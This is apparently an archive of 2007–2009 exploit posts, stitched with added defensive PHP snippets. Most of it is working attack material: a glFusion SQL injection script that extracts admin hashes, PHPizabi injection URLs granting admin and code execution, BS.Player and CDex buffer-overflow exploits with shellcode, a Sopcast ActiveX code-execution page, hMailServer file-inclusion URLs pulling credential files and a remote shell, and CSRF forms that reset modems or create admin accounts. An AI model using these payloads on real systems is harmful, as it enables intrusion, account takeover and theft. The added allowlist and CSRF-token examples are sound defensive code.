$this->_sort_arr['field'] = isset($_REQUEST['order']) ? COM_applyFilter($_REQUEST['order']) : $this->_def_sort_arr['field'];
$this->_sort_arr['direction'] = isset($_REQUEST['direction']) ? COM_applyFilter($_REQUEST['direction']) : $this->_def_sort_arr['direction'];
if (is_numeric($this->_sort_arr['field'])) {
    $ord = $this->_def_sort_arr['field'];
    $this->_sort_arr['field'] = SQL_TITLE;
} else {
    $ord = $this->_sort_arr['field'];
}

$order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this->_sort_arr['direction']);
...

filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774.

We are in an ORDER clause and the vars are not surrounded by quotes;
bad chars are ex. , , / ,', ;, \,,*,`
but what about spaces and (... you can use a CASE WHEN .. THEN .. ELSE .. END
construct instead of ex. IF(..,..,..) and -- instead of /* to close
your query.
And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible, COM_applyFilter() is a very commonly used one.

Additional notes: the 'direction' argument is uppercased by strtoupper();
you know that table identifiers on Unix-like systems are case sensitive
but not on MS Windows, however I chose to inject in the 'order' one
for better results.
Vars come from the $_REQUEST[] array so you can pass them by $_POST[] or
$_COOKIE[], which is not intended I suppose.

This exploit extracts the hash from the users table; also note that you do
not need to crack the hash, you can authenticate as admin with the
cookie:

glfusion=[uid]; glf_password=[hash];

as admin you can upload php files in public folders!

Very soft mitigations: glFusion does not show the table prefix in sql
errors, the default however is 'gl_'. I prepared a fast routine to extract
it from the information_schema db if available.
To successfully interrogate MySQL you need at least 2 records in the
same topic section, however the default installation creates 2 links with
topic glFusion

*/

$err[0]=[!] This script is intended to be launched from the cli!;
$err[1]=[!] You need the curl extesion loaded!;

  if (php_sapi_name()  cli) {
die($err[0]);   
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) : nil;
}
else {
!dl(php_curl.so) ? die($err[1]) : nil;
}
}

  function syntax(){
  print (   
 Syntax: php .$argv[0]. [host] [path] [[port]] [OPTIONS] 
   \n.
 Options:  
   \n.
   --port:[port]   - specify a port
 \n.
 default - 80 
 \n.
   --prefix- try to extract table prefix from 
information.schema\n.
 default - gl_
 \n.
   --uid:[n]   - specify an uid other than default 
(2,usually admin)\n.
   --proxy:[host:port] - use proxy 
 \n.
   --enforce   - try even with 'not vulnerable' 
message );
 die();
  }

error_reporting(E_ALL ^ E_NOTICE);
$host=$argv[1];
$path=$argv[2];
$prefix=gl_;  //default
$uid=2;
$where= uid=$uid; //user id, usually admin, anonymous = 1

  $argv[2] ? print([*] Attacking...\n) : syntax();
$_f_prefix=false;
$_use_proxy=false;
$port=80;
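ORDER BY takes identifiers, which can neither be quoted nor bound as prepared-statement parameters, so a character blacklist like COM_applyFilter() is the wrong tool here. As an added example (not glFusion's code), the sort clause built from an exact-match allowlist of sortable columns and of the two directions; the column names are assumptions.

```php
<?php
// Added example, not glFusion's code: build the ORDER BY clause from an
// allowlist instead of filtering characters out of the request value.
// The column names are assumptions standing in for a real list's fields.
function orderBySql(array $allowedFields, string $defaultField, $order, $direction): string
{
    // Exact, strict string match against known identifiers; anything else
    // (CASE ... END constructs, comment sequences, numbers) falls back to
    // the default column instead of being interpolated.
    $field = (is_string($order) && in_array($order, $allowedFields, true))
        ? $order
        : $defaultField;

    // Only two directions exist; nothing else is ever interpolated.
    $dir = (is_string($direction) && strtoupper($direction) === 'DESC') ? 'DESC' : 'ASC';

    return ' ORDER BY ' . $field . ' ' . $dir;
}

// Constructed inputs. In the caller, read 'order' and 'direction' from $_GET
// or $_POST explicitly rather than from $_REQUEST, so that cookies cannot
// supply them (the advisory notes that $_REQUEST accepts $_COOKIE values).
$fields = ['title', 'date', 'hits'];
var_dump(orderBySql($fields, 'date', 'title', 'desc'));
var_dump(orderBySql($fields, 'date', 'title -- [SQL HERE]', 'asc'));
var_dump(orderBySql($fields, 'date', null, null));
```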

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

2009-03-24 Thread nospam

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/


vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

function bufferProcParse($buffer) {
    global $CONF;

    $tpl = new template;
    $tpl->LoadThis($buffer);
    // HANDLE POSTED NOTEPAD DATA ///
    if (isset($_GET[notepad_body])) {
        myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET[notepad_body])."' WHERE `id`='".me(id)."'");
        me(flush);
    }
..

note urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%

2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE 
username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%

20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.editid={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always available,
see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

..
if (isset($_POST[Submit])) {
    if ($handle = fopen("modules/cms/{$_GET[id]}.php", "w")) {

        $body =
            "<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
            .preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST[body][0]))
            ."\n<!-- Edited by ".me(username)." on ".date($CONF[LOCALE_HEADER_DATE_TIME])." -->"
        ;

        fwrite($handle, $body);
        fclose($handle);
..

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

..


original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html


Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)

2009-03-20 Thread nospam
?php
/*
Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
by Nine:Situations:Group::pyrokinesis

Overlong hostnames in bsplayer playlist files cause eax and the seh handlers to be
overwritten. Cannot reliably debug with olly because of code compression; I just
used faultmon/memdump/msfpescan and I chose the easy/universal way with seh.
There are some pop ret addresses in common among the vulnerable versions...

Well it says local but I consider it a remote one because .bsl files are
associated to the program
Tested and working against:

..
v2.32 Build 975 Free
v2.34 Build 980 PRO
win xp pro sp2 / sp3
win 2k3 sp1

not vulnerable:
v2.35 Build 985 PRO
V2.36 Build 990 Free/Pro


*/
$buffer=
\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46.
\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f.
\x52\x61\x77\x2d\x48\x69\x67\x68\x2e;

$nop1=str_repeat(\x90,384);
$eax_again=;
$nop2=str_repeat(\x90,12);
$eax=;
$nop3=str_repeat(\x90,8);
$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;

$jmp=\xeb\x08\x90\x90;

$seh=\xb1\xad\x41\x00; //0x0041adb1   pop pop ret bsplayer.exe

$nop4=str_repeat(\x90,100);

// win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 
http://metasploit.com
$scode=
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49.
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47.
\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32.
\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69.
\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e.
\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56.
\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75.
\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f.
\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68.
\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68.
\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44.
\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67.
\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39.
\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b.
\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65.
\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f.
\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31.
\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39.
\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63.
\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62.
\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47;

$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
$buffer.=
x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70.
\x6c\x73\x0d\x0a\x00;

$fp=fopen(evil.bsl,w+);
if (!$fp) {die(cannot create evil.bsl!);}
@fputs($fp,$buffer);
@fclose($fp);
?

original url: http://retrogod.altervista.org/9sg_bsplayer_seh.html


CDex v1.70b2 (.ogg) local buffer overflow exploit poc

2009-03-18 Thread nospam
<?php

/*

CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)

by Nine:Situations:Group::Pyrokinesis

software site: http://cdexos.sourceforge.net/

our site: http://retrogod.altervista.org/

A very reliable buffer overflow exists in the way cdex processes Ogg Vorbis Info
headers.

usage:

c:\php\php 9sg_cdex_local.php

evil.ogg is created, now navigate:

Main Menu -> Tools -> Media file Player -> Select files -> Browse to a folder ->
-> Open -> Play evil.ogg

*/



$_frgmnt1 =

OggS. //for what I understood ... beginning

\x00. //stream_structure_version

\x02. //header_type_flag

\x00\x00\x00\x00\x00\x00\x00\x00. //granular_position

\x66\x07\x00\x00. //bitstream_serial_number

\x00\x00\x00\x00. //page_sequence_number

\x92\xa8\x3b\xd9. //CRC_checksum

\x01. //number_page_segments

\x1e. //segments_table

\x01.

vorbis.

\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00.

\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01;



$_frgmnt2 =

OggS.

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07.

\x00\x00\x01\x00\x00\x00.

\x00\x00\x00\x00. //set crc to 0, after calculate the real crc

\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff.

\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff.

\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff.

\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff.

\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff.

\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00.

\x00Xiph.Org\x20libVor.

bis\x20I\x2020040629\x03\x00.

\x00\x00\x07\x20\x00\x00.

ARTIST=;



$payload_len=8192;



//msg box shellcode saying hey ...

//replace with your own, the script recalculates the CRC checksum

$scode =

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a.

\xbb\x7b\x1d\x80\x7c. //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3

\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50.

\xbb\x30\xae\x80\x7c. //GetProcAddress at 0x7c80ae30 in kernel32.dll

\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51.

\x51\x52\xff\xd0\x31\xd2\x50.

\xb8\xfa\xca\x81\x7c. //ExitProcess at 0x7c81cafa in kernel32.dll

\xff\xd0\xe8\xc4\xff.

\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff.

\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff.

\xff\x48\x65\x79\x4e;



$_boom=str_repeat(\x90,2048 - strlen($scode)).$scode.

\x67\x86\x86\x7c.  //eip - 0x7C868667  call esp kernel32.dll

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90.

\x83\xec\x7f. // sub esp,07f

\x83\xec\x7f. //..

\x83\xec\x7f. //..

\x83\xec\x7f. //..

\x83\xec\x7f. //..

\xff\xd4. //call esp

\x90\x90\x90.

\x00\x00\x00\x00;//if replaced with non-zero chars, overwrites seh ... do not 
touch



$_frgmnt2.=$_boom.\x90\x90\x90\x90\x90\x90\x90\x90.str_repeat(\x90,$payload_len
 - strlen($_boom) - 8);

$_frgmnt2.=\x0a\x20\x00\x00.

PERFORMER=;

$_frgmnt2.=str_repeat(\x90,$payload_len);

$_frgmnt2.=\x09\x00\x00\x00.

DATE=2009.

\x01\x05.

vorbis.

\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0.

\x90\x55\x00\x00\x10\x00\x00.

\x60\x24\x29\x0e\x93\x66\x49\x29\xa5.

\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94.

\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20.

\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce.

\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51.

\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25.

\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21.

\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7.

\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4.

\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4.

\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7.

\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00.

\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6.

\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00.

\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2.

\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d.

\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59.

\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18.

\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20.

\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03.

\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92.

\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c.

\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00.

\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a.

\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65.


Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc

2009-02-26 Thread nospam
<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
 user assisted remote code execution poc
 by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
it is possible to associate an arbitrary executable to the external player
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are shown) which opens Windows Media Player by default.
When the user clicks this button, the executable is launched without prompts.
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application.
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID="clsid:8FEFF364-6A5F-4966-A917-A3AC28411659"
HEIGHT=375
WIDTH=375>
</OBJECT>
</BODY>
</HTML>

original url: http://retrogod.altervista.org/9sg_sopcastia.html


Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC

2008-12-29 Thread nospam
Attack vector is Internet Explorer 7/8b against a system with a coexistent 
google chrome installation. It works exactly like this:
http://www.milw0rm.com/exploits/7181


hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion

2008-11-06 Thread nospam
hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc
by Nine:Situations:Group::strawdog


our site: http://retrogod.altervista.org

software site: http://www.hmailserver.com/
description: http://en.wikipedia.org/wiki/HMailServer

google dork: PHPWebAdmin for hMailServer intitle:PHPWebAdmin 
-site:hmailserver.com -dork

poc:

regardless of register_globals & magic_quotes_gpc:
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00
http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../..
/../Program+Files/hmailserver/Bin/hmailserver.ini%00

with register_globals = on:
(prepare a functions.php folder on somehost.com with an index.html with your 
shell inside on 
a php enabled server,
otherwise a functions.php shell on a php disabled one)
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir

with register_globals = on & magic_quotes_gpc = off :
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00

Bin folder can be found in a different location, disclose the path by simply 
calling:

http://hostname/path_to_webadmin/initialize.php

interesting file:

hMailServer.INI - contains two interesting fields:
- the Administrator password crypted with md5,
- by having knowledge of that you can calculate the MySQL root password,
  specified in the password field.
  You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script

(*)
vulnerable code, index.php:
<?php

   error_reporting(E_ALL);

   if (!file_exists("config.php"))
   {
      echo "Please rename config-dist.php to config.php. The file is found in the PHPWebAdmin root folder.";
      die;
   }

   require_once("config.php");
   require_once("initialize.php");

   set_error_handler("ErrorHandler");

   if (is_php5())
      set_exception_handler("ExceptionHandler");

   $page = hmailGetVar("page");

   if ($page == "")
      $page = "frontpage";

   $isbackground = (substr($page, 0,10) == "background");

   if ($isbackground)
      $page = "$page.php";
   else
      $page = "hm_$page.php";

   // Check that the page really exists.
   $page = stripslashes($page);
   if (!file_exists($page))
      hmailHackingAttemp();

   // If it's a background page, run here.
   if ($isbackground)
   {
      include $page; //<-- !!!

      // Page is run, die now.
      die;
   }
..

for clearness, here it is hmailGetVar() function in /include/functions.php:
..
function hmailGetVar($p_varname, $p_defaultvalue = null)
{
$retval = $p_defaultvalue;
if(isset($_GET[$p_varname]))
{
$retval = $_GET[$p_varname];
}
else if (isset($_POST[$p_varname]))
{
$retval = $_POST[$p_varname];
}
else if (isset($_REQUEST[$p_varname]))
{
$retval = $_REQUEST[$p_varname];
}

if (get_magic_quotes_gpc())
   $retval = stripslashes($retval);

return $retval;
}
..

so the page argument can be passed by $_GET[], $_POST[] or $_COOKIE[] arrays.
Note the stripslashes(), which disables magic_quotes_gpc on every argument
passed.

(**)
initialize.php:
..
$hmail_config['rootpath']   = str_replace("\\","/",$hmail_config['rootpath']);
$hmail_config['includepath']= str_replace("\\","/",$hmail_config['includepath']);
$hmail_config['temppath']   = str_replace("\\","/",$hmail_config['temppath']);
require_once($hmail_config['includepath'] . "functions.php");
..
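The root cause in the index.php fragment above is that a request parameter becomes a filesystem path and is then handed to include. The following is an added example, not PHPWebAdmin's code, of the allowlist dispatch pattern that closes both the traversal and the null-byte trick: the parameter is used only as a key into a fixed map, never as a path. The PAGES_DIR location and the page names in the map are assumptions for illustration.

```php
<?php
// Added example (not PHPWebAdmin's code): allowlist-based page dispatch that
// replaces the `include $page` pattern from the hMailServer post.
// PAGES_DIR and the entries of ALLOWED_PAGES are assumed for illustration.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Every file the router may ever include is named here; nothing else is.
const ALLOWED_PAGES = [
    'frontpage'         => 'hm_frontpage.php',
    'domains'           => 'hm_domains.php',
    'background/status' => 'background/status.php',
];

/**
 * Resolve a requested page name to an absolute file path, or null when the
 * request is not allowed. The value is never used as a path fragment: it is
 * only compared against the keys of the allowlist, so "../" and "%00" have
 * nothing to act on.
 */
function resolvePage(string $requested): ?string
{
    if ($requested === '') {
        $requested = 'frontpage';
    }
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // Defense in depth: confirm the resolved file really sits under PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Read only $_GET: the original hmailGetVar() also accepted $_POST and
// $_REQUEST, which widened the attack surface for no benefit.
$raw  = $_GET['page'] ?? '';
$page = resolvePage(is_string($raw) ? $raw : '');

if ($page === null) {
    http_response_code(400);
    // Log the rejected value for detection; do not echo it back unescaped.
    error_log('PHPWebAdmin: rejected page parameter ' . var_export($raw, true));
    exit('Invalid page.');
}
include $page;
```

With this shape the stripslashes() call and the file_exists() check become irrelevant: an attacker cannot name a file that is not already in the map, and every rejected request leaves a log line that a monitoring rule can alert on.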


Sea-Surfing on the Motorola Surfboard

2008-04-21 Thread th3 . r00k . nospam
More information about this flaw can be found here:

http://www.rooksecurity.com/blog/?p=4


Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by 
means of Cross Site Request Forgery.


The latest version of The Motorola Surfboard is affected at the time of the 
writing.


Restarts the modem:

<html>
<form id=1 method=post action='http://192.168.100.1/configdata.html'>
<input name='BUTTON_INPUT' value='Restart+Cable+Modem'>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>


This CSRF will disconnect the user from the internet for longer.

"The process to get back online from a factory default condition could take
from 5 to 30 minutes."

<html>
<form id=2 method=post action='http://192.168.100.1/configdata.html'>
<input name='BUTTON_INPUT' value='Reset+All+Defaults'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>



Peace


BitTorrent Clients and CSRF

2008-04-18 Thread th3 . r00k . nospam
The following are proof of concept exploits against three bittorrent clients:
uTorrent's WebUI, Azureus's HTML WebUI, and TorrentFlux.


More information:

http://www.rooksecurity.com/blog/?p=10


TorrentFlux v2.3(Latest)

http://sourceforge.net/projects/torrentflux/


If you force TorrentFlux to download a torrent that contains a file 
backdoor.php you will be able to execute it by browsing here:

http://localhost/torrentflux_2.3/html/downloads/USER_NAME/

You do not have to know a password to access this folder, but you will have to 
know the username.

<html>
<form id='file_attack' method=post action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name=url_upload value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</form>
</html>
<script>
document.getElementById('file_attack').submit();
</script>


<html>
Add an administrative account:
<form id='create_admin' method="post" action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name="newUser" value="sadmin">
<input type=hidden name="pass1" value="password">
<input type=hidden name="pass2" value="password">
<input type=hidden name="userType" value=1>
<input type=submit value='create admin'>
</form>
</html>
<script>
document.getElementById('create_admin').submit();
</script>


uTorrent's WebUI is also affected:

http://forum.utorrent.com/viewtopic.php?id=14565

force file download:

http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent


utorrent change administrative login information:

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096

After the username or password have been changed then the browser must
re-authenticate.

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1

So is Azureus's HTML WebUI:

Force file download:

http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
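Every request in the Surfboard and BitTorrent-client posts above succeeds because the server accepts any well-formed POST or GET carrying the browser's ambient credentials. The synchronizer-token pattern below is an added example, not code from any of those products: a state-changing handler that refuses the request unless it carries a secret bound to the user's session, with a same-origin check on the Origin/Referer header as a second, independent layer. The function names and the form's action are assumptions for illustration.

```php
<?php
// Added example (not Motorola, TorrentFlux, uTorrent or Azureus code):
// CSRF protection for a state-changing form handler. Function names and the
// "Restart" action are assumed for illustration.

declare(strict_types=1);
session_start();

/** Return the per-session anti-CSRF token, generating it on first use. */
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only if the submitted token matches the session token exactly. */
function csrfTokenIsValid($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // Constant-time comparison: no timing side channel on the token bytes.
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

/**
 * Browsers attach an Origin (or at least a Referer) header to cross-site
 * POSTs, so a form auto-submitted from an attacker's page carries the
 * attacker's host here. Missing headers are treated as a failure, which
 * is the strict choice for a privileged action.
 */
function requestIsSameOrigin(string $expectedHost): bool
{
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)
        || !requestIsSameOrigin($_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        error_log('CSRF check failed from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        exit('Request rejected.');
    }
    // The privileged action (restart, factory reset, add user, change
    // credentials) runs only past this point.
    exit('Action performed.');
}
?>
<form method="post" action="">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') ?>">
  <button name="BUTTON_INPUT" value="Restart">Restart</button>
</form>
```

The GET-based uTorrent and Azureus requests need one more change that no token can supply on its own: actions that change state must be accepted over POST only, otherwise a plain image tag or link is enough to trigger them.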


etomite xss

2008-02-14 Thread th3 . r00k . nospam
Homepage: http://www.etomite.com/

Tested Version: 0.6.1 Final

Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill

This is a flaw because $_SERVER['PHP_INFO'] is being trusted.

$_SERVER['PHP_INFO'] will contain this value when the exploit url is used:

/index.php/"><script>alert("test")</script>/fill

/fill is removed.


Trust no one.

Michael Brooks


Re: Wordpress - Broken Access Control

2007-12-18 Thread th3 . r00k . nospam
Hi all,


